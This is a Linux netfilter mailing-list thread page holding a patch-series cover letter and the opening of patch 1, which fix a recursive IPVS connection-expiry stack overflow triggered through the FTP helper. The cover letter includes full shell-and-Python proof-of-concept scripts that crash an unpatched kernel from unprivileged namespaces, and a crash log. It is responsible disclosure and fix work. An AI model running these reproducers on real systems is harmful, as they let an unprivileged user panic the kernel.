Linux Netfilter development
 help / color / mirror / Atom feed
* [PATCH nf v6 0/3] ipvs: avoid stack overflow from recursive connection expiration
@ 2026-10-05 13:06 Zihan Xi
  2026-10-05 13:06 ` [PATCH nf v6 1/3] ipvs: fix problems during connection deletion Zihan Xi
                   ` (3 more replies)
  0 siblings, 4 replies; 5+ messages in thread
From: Zihan Xi @ 2026-10-05 13:06 UTC (permalink / raw)
  To: lvs-devel, netfilter-devel
  Cc: dsahern, idosch, horms, ja, davem, edumazet, pabeni, pablo, fw,
	phil, vega, root, zihanx

Hi Linux kernel maintainers,

We found and validated a issue in
net/netfilter/ipvs/ip_vs_ftp.c and net/netfilter/ipvs/ip_vs_conn.c. The
bug is reachable by a non-root user via user and net namespace.
We've tested it, and it should not affect any other functionality.

This series contains 3 patches:

  1/3 Fix problems during IPVS connection deletion.
  2/3 Replace recursive controller expiration with an iterative cleanup
      path.
  3/3 Reject zero and configured FTP control ports as data ports.

We will provide detailed information about the bug
in this email, along with PoCs to trigger it.

---- details below ----

Bug details:

The trigger entry point is ip_vs_ftp_out() in
net/netfilter/ipvs/ip_vs_ftp.c. It parses a PASV or EPSV reply from the
real server and creates a wildcard data connection from the advertised
port. The baseline reproducer uses port 21, the default FTP control
port. ip_vs_conn_new() then binds the FTP helper to the new connection
again. Because the child has IP_VS_CONN_F_NO_CPORT, the next connection
from the same client to the VIP on port 21 matches the wildcard child
instead of creating a new top-level entry. Repeating the FTP exchange
builds a chain of controlled connections.

The active-mode entry point, ip_vs_ftp_in(), has the same chain-building
condition when the derived data port is a configured control port. The
data connection's virtual port is derived from cp->vport - 1. With
ports={21,20}, the derived port is 20, so ip_vs_conn_new() can bind the
FTP helper again.

The FTP entry points are in ip_vs_ftp.c, but the stack-overflow root
cause is in the generic cleanup path in ip_vs_conn.c. When a controlled
connection expires, ip_vs_conn_expire() can delete and expire its
controller. The old path can then call ip_vs_conn_expire() recursively.
A long controlled-connection chain can exhaust the kernel stack. The
reproduced failure occurs during network namespace teardown, but the
cleanup bug is in the generic controller-chain path, not a teardown-only
special case.

Patch 1 fixes the connection lifetime race by making the refcount account
for active users and the pending or running timer. The deletion path can
steal the pending timer reference, and controller-chain deletion is
protected by RCU. The expiration path no longer relies on a separate
timer_delete() after the reference handoff.

Patch 2 continues expiration with the controller after the current
connection has been fully cleaned up instead of recursively calling the
expiration path. The cleanup remains synchronous while using one stack
frame for the whole chain. It uses the connection-deletion fix from patch
1 for the controller handoff.

Patch 3 rejects zero and configured FTP control ports before creating
passive data connections in ip_vs_ftp_out(), covering both PASV and EPSV.
It also rejects a zero active-mode client port and a data port derived
from a configured control port in ip_vs_ftp_in(). Valid data ports
continue through the existing path.

The recursive-cleanup root cause was introduced by
f9200a52eedf ("ipvs: avoid expiring many connections from timer"). The FTP
helper's acceptance of a control port is a separate root-cause fact,
introduced by 1da177e4c3f4 ("Linux-2.6.12-rc2"). These are different
root-cause facts, so the fixes use separate Fixes: tags.

Reproducer:

The reproducers are shell scripts with embedded Python and do not
require compilation. The baseline reproducer was run as follows:

    SELF_UNSHARE=1 MODE=exit ./poc-original.sh 400

The v6 connection-cleanup validation was run as follows:

    SELF_UNSHARE=1 MODE=exit ./poc-original.sh 200

The passive-mode validation was run as follows:

    SELF_UNSHARE=1 MODE=exit ./poc.sh 200

The active-mode validation used the following kernel parameter and
command:

    ip_vs_ftp.ports=21,20
    SELF_UNSHARE=1 MODE=exit ./poc-active.sh 1

packetdrill was not used because the trigger requires namespace creation,
the legacy IPVS sockopt ABI, a cooperating TCP server, and namespace
teardown. packetdrill cannot express that complete control-plane setup
and lifetime on its own.

We run the PoC in a 2 vCPU, 2 GB RAM x86 QEMU environment.

The original baseline crash was collected on 70194dc37670
(7.3.0-rc2-g70194dc37670). The v6 series is based on nf/HEAD
9c572a83037a. The crash log below is retained as original trigger
evidence; it is not presented as a validation run on the v6 baseline.

The v6 connection-cleanup validation created 200 connections and 201
IPVS entries, completed namespace teardown, and reported no KASAN, BUG,
Oops, panic, stack-guard, general-protection, or refcount diagnostic.
The passive FTP validation rejected 200/200 control-port replies, kept
200 IPVS entries, and created zero passive data connections. The active
FTP validation ran with DEPTH=1 (one FTP control connection), reported
one IPVS entry before namespace teardown, and created zero derived data
connections. Both validation runs completed namespace teardown without
the listed kernel diagnostics.

The crash excerpt below is copied from the decoded baseline report.
Unrelated boot output, registers, disassembly, and local execution
paths are omitted.

Reproducer source files:

------BEGIN poc-original.sh------
#!/bin/sh
set -eu

DEPTH="${1:-400}"
MODE="${MODE:-exit}"
SELF_UNSHARE="${SELF_UNSHARE:-0}"

if [ "${SELF_UNSHARE}" = "1" ] && [ -z "${POC_INNER:-}" ]; then
	exec env POC_INNER=1 MODE="${MODE}" SELF_UNSHARE=0 \
		unshare -Urn -- "$0" "${DEPTH}"
fi

ulimit -n 65535 2>/dev/null || true

IP=/usr/sbin/ip
PYTHON=/usr/bin/python3

VIP=198.51.100.1
REAL=198.51.100.2
CLIENT=198.51.100.3
PORT=21

"${IP}" link set lo up
"${IP}" addr add "${VIP}/32" dev lo 2>/dev/null || true
"${IP}" addr add "${REAL}/32" dev lo 2>/dev/null || true
"${IP}" addr add "${CLIENT}/32" dev lo 2>/dev/null || true

exec "${PYTHON}" - "${DEPTH}" "${MODE}" "${VIP}" "${REAL}" "${CLIENT}" "${PORT}" <<'PY'
import ctypes
import os
import socket
import sys
import threading
import time

depth = int(sys.argv[1])
mode = sys.argv[2]
vip = sys.argv[3]
real = sys.argv[4]
client_ip = sys.argv[5]
port = int(sys.argv[6])

ready = threading.Event()
server_error = []
client_error = []
accepted = []
clients = []

IP_VS_BASE_CTL = 64 + 1024 + 64
IP_VS_SO_SET_ADD = IP_VS_BASE_CTL + 2
IP_VS_SO_SET_FLUSH = IP_VS_BASE_CTL + 5
IP_VS_SO_SET_ADDDEST = IP_VS_BASE_CTL + 7


class Svc(ctypes.Structure):
    _fields_ = [
        ("protocol", ctypes.c_uint16),
        ("addr", ctypes.c_uint32),
        ("port", ctypes.c_uint16),
        ("fwmark", ctypes.c_uint32),
        ("sched_name", ctypes.c_char * 16),
        ("flags", ctypes.c_uint),
        ("timeout", ctypes.c_uint),
        ("netmask", ctypes.c_uint32),
    ]


class Dest(ctypes.Structure):
    _fields_ = [
        ("addr", ctypes.c_uint32),
        ("port", ctypes.c_uint16),
        ("conn_flags", ctypes.c_uint),
        ("weight", ctypes.c_int),
        ("u_threshold", ctypes.c_uint32),
        ("l_threshold", ctypes.c_uint32),
    ]


def native_u32(ip):
    return int.from_bytes(socket.inet_aton(ip), sys.byteorder)


def ipvs_sock():
    return socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)


def ipvs_flush():
    s = ipvs_sock()
    try:
        s.setsockopt(socket.IPPROTO_IP, IP_VS_SO_SET_FLUSH, b"")
    finally:
        s.close()


def ipvs_add_service():
    svc = Svc()
    svc.protocol = socket.IPPROTO_TCP
    svc.addr = native_u32(vip)
    svc.port = socket.htons(port)
    svc.fwmark = 0
    svc.sched_name = b"rr"
    svc.flags = 0
    svc.timeout = 0
    svc.netmask = 0

    s = ipvs_sock()
    try:
        s.setsockopt(socket.IPPROTO_IP, IP_VS_SO_SET_ADD, bytes(svc))
    finally:
        s.close()
    return svc


def ipvs_add_dest(svc):
    dest = Dest()
    dest.addr = native_u32(real)
    dest.port = socket.htons(port)
    dest.conn_flags = 0
    dest.weight = 1
    dest.u_threshold = 0
    dest.l_threshold = 0

    s = ipvs_sock()
    try:
        s.setsockopt(socket.IPPROTO_IP, IP_VS_SO_SET_ADDDEST, bytes(svc) + bytes(dest))
    finally:
        s.close()


def recv_line(sock):
    data = bytearray()
    while not data.endswith(b"\n"):
        chunk = sock.recv(1)
        if not chunk:
            raise RuntimeError("unexpected EOF")
        data.extend(chunk)
    return bytes(data)


def server():
    try:
        srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((real, port))
        srv.listen(depth + 16)
        ready.set()
        for i in range(depth):
            conn, addr = srv.accept()
            conn.sendall(b"220 ready\r\n")
            line = recv_line(conn)
            if b"EPSV" not in line.upper():
                raise RuntimeError(f"unexpected request on level {i}: {line!r}")
            conn.sendall(b"229 Entering Extended Passive Mode (|||21|)\r\n")
            accepted.append(conn)
        while True:
            time.sleep(1)
    except BaseException as exc:
        server_error.append(repr(exc))
        ready.set()


try:
    try:
        ipvs_flush()
    except OSError:
        pass
    service = ipvs_add_service()
    ipvs_add_dest(service)
except OSError as exc:
    raise SystemExit(f"ipvs setup failed: {exc}")


threading.Thread(target=server, daemon=True).start()
ready.wait()
if server_error:
    raise SystemExit(f"server failed early: {server_error[0]}")

for i in range(depth):
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind((client_ip, 0))
        s.connect((vip, port))
        banner = recv_line(s)
        if not banner.startswith(b"220 "):
            raise RuntimeError(f"unexpected banner on level {i}: {banner!r}")
        s.sendall(b"EPSV\r\n")
        reply = recv_line(s)
        if b"229 " not in reply:
            raise RuntimeError(f"unexpected EPSV reply on level {i}: {reply!r}")
        clients.append(s)
        if (i + 1) % 50 == 0 or i + 1 == depth:
            print(f"built {i + 1} connections", flush=True)
    except BaseException as exc:
        client_error.append(repr(exc))
        break

if client_error:
    raise SystemExit(f"client failed: {client_error[0]}")
if server_error:
    raise SystemExit(f"server failed: {server_error[0]}")

try:
    with open("/proc/net/ip_vs_conn", "r", encoding="utf-8", errors="replace") as f:
        conn_lines = sum(1 for _ in f) - 1
except OSError:
    conn_lines = -1

print(f"ip_vs_conn entries before trigger: {conn_lines}", flush=True)

if mode == "hold":
    while True:
        time.sleep(1)
elif mode == "flush":
    ipvs_flush()
    print("IPVS flush returned", flush=True)
    while True:
        time.sleep(1)
elif mode == "exit":
    print("exiting namespace holder", flush=True)
    sys.stdout.flush()
    os._exit(0)
else:
    raise SystemExit(f"unknown MODE={mode!r}")
PY
------END poc-original.sh--------

------BEGIN poc.sh------
#!/bin/sh
set -eu

DEPTH="${1:-400}"
MODE="${MODE:-exit}"
SELF_UNSHARE="${SELF_UNSHARE:-0}"

if [ "${SELF_UNSHARE}" = "1" ] && [ -z "${POC_INNER:-}" ]; then
	exec env POC_INNER=1 MODE="${MODE}" SELF_UNSHARE=0 \
		unshare -Urn -- "$0" "${DEPTH}"
fi

ulimit -n 65535 2>/dev/null || true

IP=/usr/sbin/ip
PYTHON=/usr/bin/python3

VIP=198.51.100.1
REAL=198.51.100.2
CLIENT=198.51.100.3
PORT=21

"${IP}" link set lo up
"${IP}" addr add "${VIP}/32" dev lo 2>/dev/null || true
"${IP}" addr add "${REAL}/32" dev lo 2>/dev/null || true
"${IP}" addr add "${CLIENT}/32" dev lo 2>/dev/null || true

exec "${PYTHON}" - "${DEPTH}" "${MODE}" "${VIP}" "${REAL}" "${CLIENT}" "${PORT}" <<'PY'
import ctypes
import os
import socket
import sys
import threading
import time

depth = int(sys.argv[1])
mode = sys.argv[2]
vip = sys.argv[3]
real = sys.argv[4]
client_ip = sys.argv[5]
port = int(sys.argv[6])

ready = threading.Event()
server_error = []
client_error = []
accepted = []
clients = []
rejected = 0

IP_VS_BASE_CTL = 64 + 1024 + 64
IP_VS_SO_SET_ADD = IP_VS_BASE_CTL + 2
IP_VS_SO_SET_FLUSH = IP_VS_BASE_CTL + 5
IP_VS_SO_SET_ADDDEST = IP_VS_BASE_CTL + 7


class Svc(ctypes.Structure):
    _fields_ = [
        ("protocol", ctypes.c_uint16),
        ("addr", ctypes.c_uint32),
        ("port", ctypes.c_uint16),
        ("fwmark", ctypes.c_uint32),
        ("sched_name", ctypes.c_char * 16),
        ("flags", ctypes.c_uint),
        ("timeout", ctypes.c_uint),
        ("netmask", ctypes.c_uint32),
    ]


class Dest(ctypes.Structure):
    _fields_ = [
        ("addr", ctypes.c_uint32),
        ("port", ctypes.c_uint16),
        ("conn_flags", ctypes.c_uint),
        ("weight", ctypes.c_int),
        ("u_threshold", ctypes.c_uint32),
        ("l_threshold", ctypes.c_uint32),
    ]


def native_u32(ip):
    return int.from_bytes(socket.inet_aton(ip), sys.byteorder)


def ipvs_sock():
    return socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)


def ipvs_flush():
    s = ipvs_sock()
    try:
        s.setsockopt(socket.IPPROTO_IP, IP_VS_SO_SET_FLUSH, b"")
    finally:
        s.close()


def ipvs_add_service():
    svc = Svc()
    svc.protocol = socket.IPPROTO_TCP
    svc.addr = native_u32(vip)
    svc.port = socket.htons(port)
    svc.fwmark = 0
    svc.sched_name = b"rr"
    svc.flags = 0
    svc.timeout = 0
    svc.netmask = 0

    s = ipvs_sock()
    try:
        s.setsockopt(socket.IPPROTO_IP, IP_VS_SO_SET_ADD, bytes(svc))
    finally:
        s.close()
    return svc


def ipvs_add_dest(svc):
    dest = Dest()
    dest.addr = native_u32(real)
    dest.port = socket.htons(port)
    dest.conn_flags = 0
    dest.weight = 1
    dest.u_threshold = 0
    dest.l_threshold = 0

    s = ipvs_sock()
    try:
        s.setsockopt(socket.IPPROTO_IP, IP_VS_SO_SET_ADDDEST, bytes(svc) + bytes(dest))
    finally:
        s.close()


def recv_line(sock):
    data = bytearray()
    while not data.endswith(b"\n"):
        chunk = sock.recv(1)
        if not chunk:
            raise RuntimeError("unexpected EOF")
        data.extend(chunk)
    return bytes(data)


def server():
    try:
        srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((real, port))
        srv.listen(depth + 16)
        ready.set()
        for i in range(depth):
            conn, addr = srv.accept()
            conn.sendall(b"220 ready\r\n")
            line = recv_line(conn)
            if b"EPSV" not in line.upper():
                raise RuntimeError(f"unexpected request on level {i}: {line!r}")
            conn.sendall(b"229 Entering Extended Passive Mode (|||21|)\r\n")
            accepted.append(conn)
        while True:
            time.sleep(1)
    except BaseException as exc:
        server_error.append(repr(exc))
        ready.set()


try:
    try:
        ipvs_flush()
    except OSError:
        pass
    service = ipvs_add_service()
    ipvs_add_dest(service)
except OSError as exc:
    raise SystemExit(f"ipvs setup failed: {exc}")


threading.Thread(target=server, daemon=True).start()
ready.wait()
if server_error:
    raise SystemExit(f"server failed early: {server_error[0]}")

for i in range(depth):
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind((client_ip, 0))
        s.connect((vip, port))
        banner = recv_line(s)
        if not banner.startswith(b"220 "):
            raise RuntimeError(f"unexpected banner on level {i}: {banner!r}")
        s.sendall(b"EPSV\r\n")
        s.settimeout(0.2)
        try:
            reply = recv_line(s)
        except socket.timeout:
            rejected += 1
            print(f"control-port reply rejected on level {i}", flush=True)
        else:
            raise RuntimeError(
                f"control-port reply was not rejected on level {i}: {reply!r}"
            )
        clients.append(s)
        if (i + 1) % 50 == 0 or i + 1 == depth:
            print(f"built {i + 1} connections", flush=True)
    except BaseException as exc:
        client_error.append(repr(exc))
        break

if client_error:
    raise SystemExit(f"client failed: {client_error[0]}")
if server_error:
    raise SystemExit(f"server failed: {server_error[0]}")
if rejected != depth:
    raise SystemExit(f"expected {depth} rejected replies, got {rejected}")

try:
    with open("/proc/net/ip_vs_conn", "r", encoding="utf-8", errors="replace") as f:
        conn_lines = sum(1 for _ in f) - 1
except OSError:
    conn_lines = -1

print(f"rejected control-port replies: {rejected}/{depth}", flush=True)
print(f"ip_vs_conn entries before trigger: {conn_lines}", flush=True)
if conn_lines != depth:
    raise SystemExit(
        f"expected {depth} IPVS entries, got {conn_lines}; "
        "a passive data connection was created"
    )
print(f"passive data connections created: {conn_lines - depth}", flush=True)

if mode == "hold":
    while True:
        time.sleep(1)
elif mode == "flush":
    ipvs_flush()
    print("IPVS flush returned", flush=True)
    while True:
        time.sleep(1)
elif mode == "exit":
    print("exiting namespace holder", flush=True)
    sys.stdout.flush()
    os._exit(0)
else:
    raise SystemExit(f"unknown MODE={mode!r}")
PY
------END poc.sh--------

------BEGIN poc-active.sh------
#!/bin/sh
set -eu

DEPTH="${1:-400}"
MODE="${MODE:-exit}"
SELF_UNSHARE="${SELF_UNSHARE:-0}"

if [ "${SELF_UNSHARE}" = "1" ] && [ -z "${POC_INNER:-}" ]; then
	exec env POC_INNER=1 MODE="${MODE}" SELF_UNSHARE=0 \
		unshare -Urn -- "$0" "${DEPTH}"
fi

ulimit -n 65535 2>/dev/null || true

IP=/usr/sbin/ip
PYTHON=/usr/bin/python3

VIP=198.51.100.1
REAL=198.51.100.2
CLIENT=198.51.100.3
PORT=21

"${IP}" link set lo up
"${IP}" addr add "${VIP}/32" dev lo 2>/dev/null || true
"${IP}" addr add "${REAL}/32" dev lo 2>/dev/null || true
"${IP}" addr add "${CLIENT}/32" dev lo 2>/dev/null || true

exec "${PYTHON}" - "${DEPTH}" "${MODE}" "${VIP}" "${REAL}" "${CLIENT}" "${PORT}" <<'PY'
import ctypes
import os
import socket
import sys
import threading
import time

depth = int(sys.argv[1])
mode = sys.argv[2]
vip = sys.argv[3]
real = sys.argv[4]
client_ip = sys.argv[5]
port = int(sys.argv[6])

ready = threading.Event()
server_error = []
client_error = []
accepted = []
clients = []

IP_VS_BASE_CTL = 64 + 1024 + 64
IP_VS_SO_SET_ADD = IP_VS_BASE_CTL + 2
IP_VS_SO_SET_FLUSH = IP_VS_BASE_CTL + 5
IP_VS_SO_SET_ADDDEST = IP_VS_BASE_CTL + 7


class Svc(ctypes.Structure):
    _fields_ = [
        ("protocol", ctypes.c_uint16),
        ("addr", ctypes.c_uint32),
        ("port", ctypes.c_uint16),
        ("fwmark", ctypes.c_uint32),
        ("sched_name", ctypes.c_char * 16),
        ("flags", ctypes.c_uint),
        ("timeout", ctypes.c_uint),
        ("netmask", ctypes.c_uint32),
    ]


class Dest(ctypes.Structure):
    _fields_ = [
        ("addr", ctypes.c_uint32),
        ("port", ctypes.c_uint16),
        ("conn_flags", ctypes.c_uint),
        ("weight", ctypes.c_int),
        ("u_threshold", ctypes.c_uint32),
        ("l_threshold", ctypes.c_uint32),
    ]


def native_u32(ip):
    return int.from_bytes(socket.inet_aton(ip), sys.byteorder)


def ipvs_sock():
    return socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)


def ipvs_flush():
    s = ipvs_sock()
    try:
        s.setsockopt(socket.IPPROTO_IP, IP_VS_SO_SET_FLUSH, b"")
    finally:
        s.close()


def ipvs_add_service():
    svc = Svc()
    svc.protocol = socket.IPPROTO_TCP
    svc.addr = native_u32(vip)
    svc.port = socket.htons(port)
    svc.fwmark = 0
    svc.sched_name = b"rr"
    svc.flags = 0
    svc.timeout = 0
    svc.netmask = 0

    s = ipvs_sock()
    try:
        s.setsockopt(socket.IPPROTO_IP, IP_VS_SO_SET_ADD, bytes(svc))
    finally:
        s.close()
    return svc


def ipvs_add_dest(svc):
    dest = Dest()
    dest.addr = native_u32(real)
    dest.port = socket.htons(port)
    dest.conn_flags = 0
    dest.weight = 1
    dest.u_threshold = 0
    dest.l_threshold = 0

    s = ipvs_sock()
    try:
        s.setsockopt(socket.IPPROTO_IP, IP_VS_SO_SET_ADDDEST, bytes(svc) + bytes(dest))
    finally:
        s.close()


def recv_line(sock):
    data = bytearray()
    while not data.endswith(b"\n"):
        chunk = sock.recv(1)
        if not chunk:
            raise RuntimeError("unexpected EOF")
        data.extend(chunk)
    return bytes(data)


def server():
    try:
        srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((real, port))
        srv.listen(depth + 16)
        ready.set()
        for i in range(depth):
            conn, addr = srv.accept()
            conn.sendall(b"220 ready\r\n")
            line = recv_line(conn)
            if not line.upper().startswith(b"PORT "):
                raise RuntimeError(f"unexpected request on level {i}: {line!r}")
            conn.sendall(b"200 PORT command successful\r\n")
            accepted.append(conn)
        while True:
            time.sleep(1)
    except BaseException as exc:
        server_error.append(repr(exc))
        ready.set()


try:
    try:
        ipvs_flush()
    except OSError:
        pass
    service = ipvs_add_service()
    ipvs_add_dest(service)
except OSError as exc:
    raise SystemExit(f"ipvs setup failed: {exc}")


threading.Thread(target=server, daemon=True).start()
ready.wait()
if server_error:
    raise SystemExit(f"server failed early: {server_error[0]}")

for i in range(depth):
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind((client_ip, 0))
        s.connect((vip, port))
        banner = recv_line(s)
        if not banner.startswith(b"220 "):
            raise RuntimeError(f"unexpected banner on level {i}: {banner!r}")
        s.sendall(b"PORT 198,51,100,3,4,1\r\n")
        time.sleep(0.2)
        clients.append(s)
        if (i + 1) % 50 == 0 or i + 1 == depth:
            print(f"built {i + 1} connections", flush=True)
    except BaseException as exc:
        client_error.append(repr(exc))
        break

if client_error:
    raise SystemExit(f"client failed: {client_error[0]}")
if server_error:
    raise SystemExit(f"server failed: {server_error[0]}")

try:
    with open("/proc/net/ip_vs_conn", "r", encoding="utf-8", errors="replace") as f:
        conn_lines = sum(1 for _ in f) - 1
except OSError:
    conn_lines = -1

print(f"ip_vs_conn entries before trigger: {conn_lines}", flush=True)
if conn_lines != depth:
    raise SystemExit(
        f"expected {depth} IPVS entries, got {conn_lines}; "
        "a derived data connection was created"
    )
print(f"derived data connections created: {conn_lines - depth}", flush=True)

if mode == "hold":
    while True:
        time.sleep(1)
elif mode == "flush":
    ipvs_flush()
    print("IPVS flush returned", flush=True)
    while True:
        time.sleep(1)
elif mode == "exit":
    print("exiting namespace holder", flush=True)
    sys.stdout.flush()
    os._exit(0)
else:
    raise SystemExit(f"unknown MODE={mode!r}")
PY
------END poc-active.sh--------

----BEGIN crash log----
[   40.621758] BUG: KASAN: stack-out-of-bounds in __unwind_start (arch/x86/kernel/unwind_orc.c:715)
[   40.621785] Write of size 112 at addr ff11000007307e98 by task kworker/u8:0/12
[   40.621785] 
[   40.621785] CPU: 1 UID: 0 PID: 12 Comm: kworker/u8:0 Not tainted 7.3.0-rc2-g70194dc37670 #1 PREEMPT(lazy) 
[   40.621785] Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[   40.621785] Workqueue: netns cleanup_net
[   40.621785] Call Trace:

[   40.951167] BUG: unable to handle page fault for address: ff11000011430ff4
[   40.951167] #PF: supervisor instruction fetch in kernel mode
[   40.951167] #PF: error_code(0x0011) - permissions violation
[   40.951167] PGD 6f1e067 P4D 6f1f067 PUD 6f20067 PMD 80000000114001e3 
[   40.951167] Thread overran stack, or stack corrupted
[   40.951167] Oops: Oops: 0011 [#1] SMP KASAN NOPTI
[   40.951167] CPU: 0 UID: 0 PID: 11 Comm: kworker/0:1 Tainted: G        W           7.3.0-rc2-g70194dc37670 #1 PREEMPT(lazy) 
[   40.951167] Tainted: [W]=WARN
[   40.951167] Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[   40.951167] Workqueue:  0x0 (events_freezable_pwr_efficient)

[   40.951167] Call Trace:
[   40.951167]  <TASK>
[   40.951167]  ? ip_vs_conn_expire (net/netfilter/ipvs/ip_vs_conn.c:1341 net/netfilter/ipvs/ip_vs_conn.c:1375)
[   40.951167]  ? __pfx_ip_vs_conn_expire (net/netfilter/ipvs/ip_vs_conn.c:380 (discriminator 5))
[   40.951167]  ? ip_vs_conn_expire (net/netfilter/ipvs/ip_vs_conn.c:1341 net/netfilter/ipvs/ip_vs_conn.c:1375)
[   40.951167]  ? __pfx_ip_vs_conn_expire (net/netfilter/ipvs/ip_vs_conn.c:380 (discriminator 5))
[   40.951167]  ? ip_vs_conn_expire (net/netfilter/ipvs/ip_vs_conn.c:1341 net/netfilter/ipvs/ip_vs_conn.c:1375)
[   40.951167]  ? __pfx_ip_vs_conn_expire (net/netfilter/ipvs/ip_vs_conn.c:380 (discriminator 5))
[   40.951167]  ? ip_vs_conn_expire (net/netfilter/ipvs/ip_vs_conn.c:1341 net/netfilter/ipvs/ip_vs_conn.c:1375)
[   40.951167]  ? __pfx_ip_vs_conn_expire (net/netfilter/ipvs/ip_vs_conn.c:380 (discriminator 5))
[   40.951167]  </TASK>

[   40.951167] Kernel panic - not syncing: Fatal exception
[   40.951167] Shutting down cpus with NMI
[   40.951167] Kernel Offset: disabled
[   40.951167] ---[ end Kernel panic - not syncing: Fatal exception ]---
-----END crash log-----

changes in v6:
  - Replace the v5 deletion patch with Julian Anastasov's latest
    reference-accounting connection-deletion fix.
  - Rebase the iterative controller cleanup on the new deletion helper
    and retain the passive and active FTP control-port checks.
  - v5 Link: https://lore.kernel.org/all/cover.1790266803.git.zihanx@nebusec.ai/
changes in v5:
  - Update patch 1 with Julian Anastasov's v3 connection-deletion fix.
  - Rebase the iterative cleanup and resend the FTP checks as patch 3/3.
  - v4 Link: https://lore.kernel.org/all/cover.1790146910.git.zihanx@nebusec.ai/
changes in v4:
  - Add the timer-callback deletion fix as patch 1 and rebase the
    iterative controller cleanup on it.
  - Add the active-mode guard for configured FTP control ports.
  - v3 Link: https://lore.kernel.org/all/cover.1789877273.git.zihanx@nebusec.ai/
changes in v3:
  - Add the active-mode guard for configured FTP control ports.
  - Handle the timer-callback race while keeping cleanup iterative.
  - v2 Link: https://lore.kernel.org/all/cover.1789435989.git.zihanx@nebusec.ai/
changes in v2:
  - Replace recursive controller expiration with an iterative path.
  - Add the FTP-helper checks for configured control ports.
  - v1 Link: https://lore.kernel.org/all/cover.1789110326.git.zihanx@nebusec.ai/

Best regards,
Zihan Xi

Julian Anastasov (1):
  ipvs: fix problems during connection deletion

Zihan Xi (2):
  ipvs: avoid stack overflow from recursive connection expiration
  ipvs: reject FTP control ports as data ports

 include/net/ip_vs.h             |   1 -
 net/netfilter/ipvs/ip_vs_conn.c | 125 +++++++++++++++++++-------------
 net/netfilter/ipvs/ip_vs_ftp.c  |  18 +++++
 net/netfilter/ipvs/ip_vs_sync.c |   2 +-
 4 files changed, 95 insertions(+), 51 deletions(-)

-- 
2.43.0


^ permalink raw reply	[flat|nested] 5+ messages in thread

* [PATCH nf v6 1/3] ipvs: fix problems during connection deletion
  2026-10-05 13:06 [PATCH nf v6 0/3] ipvs: avoid stack overflow from recursive connection expiration Zihan Xi
@ 2026-10-05 13:06 ` Zihan Xi
  2026-10-05 13:06 ` [PATCH nf v6 2/3] ipvs: avoid stack overflow from recursive connection expiration Zihan Xi
                   ` (2 subsequent siblings)
  3 siblings, 0 replies; 5+ messages in thread
From: Zihan Xi @ 2026-10-05 13:06 UTC (permalink / raw)
  To: lvs-devel, netfilter-devel
  Cc: dsahern, idosch, horms, ja, davem, edumazet, pabeni, pablo, fw,
	phil, vega, root, zihanx

From: Julian Anastasov <ja@ssi.bg>

Sashiko reports for problem when deleting connections.

If connection timer expires, its callback can not be
concurrently running but if connection is deleted
the callback can be running on another CPU even
after all references are released. Before now we
continued with the connection freeing, risking the
callback to access the deleted connection after it
is freed. As ip_vs_conn_del() runs under RCU lock
there is no risk for accessing a connection freed
by concurrent timer callback. As Sashiko warns, the
risk is present if normal connection expires and
tries to delete its cp->control chain with
ip_vs_conn_del_put() without holding a RCU read lock.

It is evident that as the pending timer and the
running timer callback do not hold reference for
the connection, there are races which is difficult
to avoid.

Change the connection refcounting as follows:

* the connection hashing does not take reference anymore

* new connection handoffs its reference to the timer
if started in __ip_vs_conn_put_timer(), to hold it
while it is pending.

* if user finds connection in hash table it gets reference
and can handoff this reference to the pending timer if
this timer is started in __ip_vs_conn_put_timer(),
otherwise puts its reference if the timer was already
pending which is the common case.

* the pending timer handoffs its reference to the
running timer callback implicitly. By this way, the
timer callback in the common case has the last reference.
In rare cases, while the timer callback is running and
before it changes refcnt from 1 to 0, other users can get
reference and to handoff it again to the pending timer
they arm. In this case, the expiration is deferred
for later time.

As result, cp->refcnt accounts all current connection
users and the pending and running timer.

Two paths can try to delete the connection: the
normal expiration path and ip_vs_conn_del() if it
successfully steals the connection reference from the
pending timer. refcount_dec_if_one() will tell us if
we were the last active user with no packets accessing
the connection and no pending/running timers.

Change ip_vs_conn_unlink() to directly unhash the
connection because when we are the last user the
connection's forwarding method can not change.
Use smp_acquire__after_ctrl_dep() after refcount_dec_if_one()
and before reading the connection fields.

ip_vs_conn_expire() does not need to call timer_delete()
anymore because the pending timer is already accounted
in refcnt.

Add explicit rcu_read_lock() while deleting the cp->control
chain to protect from concurrent timer callback for ct to
expire it before us and to cause use-after-free.

During such races, try to keep 0 in cp->timeout as it is
a request for deleting our cp->control chain immediately.
Make sure we do not send timeout 0 (seconds) in the
v1 sync message because the backup server will select some
large default value which is not desired for small timeouts.

Remove the smp_mb__before_atomic() call from __ip_vs_conn_put(),
it is from the atomic_dec() era, now refcount_dec() has
RELEASE semantics.

Link: https://sashiko.dev/#/patchset/cover.1789435989.git.zihanx%40nebusec.ai
Link: https://netdev-ai.bots.linux.dev/sashiko/#/patchset/cover.1790266803.git.zihanx%40nebusec.ai
Fixes: f9200a52eedf ("ipvs: avoid expiring many connections from timer")
Signed-off-by: Julian Anastasov <ja@ssi.bg>
---
 include/net/ip_vs.h             |  1 -
 net/netfilter/ipvs/ip_vs_conn.c | 99 ++++++++++++++++++---------------
 net/netfilter/ipvs/ip_vs_sync.c |  2 +-
 3 files changed, 55 insertions(+), 47 deletions(-)

diff --git a/include/net/ip_vs.h b/include/net/ip_vs.h
index 32fde731bceb..94023d17f648 100644
--- a/include/net/ip_vs.h
+++ b/include/net/ip_vs.h
